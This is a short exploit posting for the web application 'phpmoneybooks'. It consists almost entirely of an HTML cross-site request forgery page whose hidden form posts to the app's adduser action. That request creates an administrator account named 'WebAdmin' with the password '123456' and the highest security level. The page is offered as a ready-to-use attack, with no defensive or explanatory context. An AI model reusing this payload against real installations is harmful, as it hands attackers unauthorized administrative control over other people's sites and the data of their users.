Exploit:
<html> <head> <title>phpmoneybooks [Add Admin]</title> </head> <H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2> <form method="POST" name="form0" action="http://localhost/index.php?module=users&action=adduser"> <input type="hidden" name="RealName" value="WebAdmin"/> <input type="hidden" name="UserName" value="WebAdmin"/> <input type="hidden" name="AcctPass" value="123456"/> <input type="hidden" name="AcctEmail" value="honker90@vip.qq.com"/> <input type="hidden" name="AcctSecurity" value="10"/> <input type="hidden" name="CustSecurity" value=""/> </form> </body> </html>
评论 (0)